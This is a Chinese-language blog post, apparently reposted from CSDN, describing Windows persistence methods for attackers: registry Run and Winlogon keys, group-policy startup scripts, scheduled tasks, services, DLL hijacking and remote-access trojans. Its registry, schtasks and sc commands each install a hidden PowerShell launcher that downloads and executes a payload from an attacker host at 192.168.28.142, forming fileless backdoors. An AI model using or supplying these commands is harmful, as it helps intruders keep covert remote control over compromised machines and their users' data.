码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • Windows权限维持方法论


    Windows权限维持方法论

    • 1.注册表自启动
    • 2.组策略设置脚本启动
    • 3.计划任务
    • 4.服务自启动
    • 5.dll劫持
    • 6.直接上远程控制木马

    1.注册表自启动

    通过修改注册表自启动键值,添加一个木马程序路径,实现开机自启动

    常用的注册表启动键:

    # Run键 
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    
    # Winlogon\Userinit键
    HKEY_CURRENT_USER\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7

    使用以下命令可以一键实现无文件注册表后门:

    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Keyname" /t REG_SZ /d "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.28.142:8888/logo.gif'))\"" /f
    
    • 1

    2.组策略设置脚本启动

    运行gpedit.msc进入本地组策略,通过Windows设置的“脚本(启动/关机)”项来实现

    极具隐蔽性,因此常常被攻击者利用来做服务器后门

    在这里插入图片描述


    3.计划任务

    通过window系统的任务计划程序功能实现定时启动某个任务,执行某个脚本

    使用以下命令可以一键实现:

    schtasks /create /sc minute /mo 1 /tn "Security Script" /tr "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(\"\"\"http://192.168.28.142:8888/logo.gif\"\"\"))\""
    
    • 1

    4.服务自启动

    通过服务设置自启动,结合powershell实现无文件后门

    首先创建一个服务:

    sc create "KeyName" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.28.142:8888/logo.gif'))\""
    
    • 1

    设置服务自启动:

    sc description  KeyName "Just For Test"   //设置服务的描述字符串
    sc config Name start= auto                //设置这个服务为自动启动
    net start Name                            //启动服务
    
    • 1
    • 2
    • 3

    5.dll劫持

    如果在进程尝试加载一个DLL时没有指定DLL的绝对路径,那么Windows会尝试去指定的目录下查找这个DLL;如果攻击者能够控制其中的某一个目录,并且放一个恶意的DLL文件到这个目录下,这个恶意的DLL便会被进程所加载,从而造成代码执行

    win7及win7以上系统增加了KnownDLLs保护,需要在注册表:

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\ExcludeFromKnownDlls
    
    • 1

    下添加 “lpk.dll” 才能顺利劫持:

    在这里插入图片描述


    6.直接上远程控制木马

    一般分为客户端和服务端,如:灰鸽子、上兴远控、梦想时代、QuasarRAT等

  • 相关阅读:
    (十一)Jmeter调用webService接口
    JAVAWEB开发之权限管理(二)——shiro入门详解以及使用方法、shiro认证与shiro授权
    npm——整理前端包管理工具(cnpm、yarn、pnpm)
    解决vue 跳转相同路由携带不同参数,页面不渲染问题
    离散化,树状数组,P5459 [BJOI2016] 回转寿司
    Nginx代理websocket为什么要这样做?
    最优秀的一批程序员,在用最蠢的方式写代码
    mac电脑如何安装python及环境搭建
    centos7磁盘扩容(虚拟机Mac m1)
    [Kubernetes] etcd的集群基石作用
  • 原文地址:https://blog.csdn.net/Gherbirthday0916/article/details/134559258
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号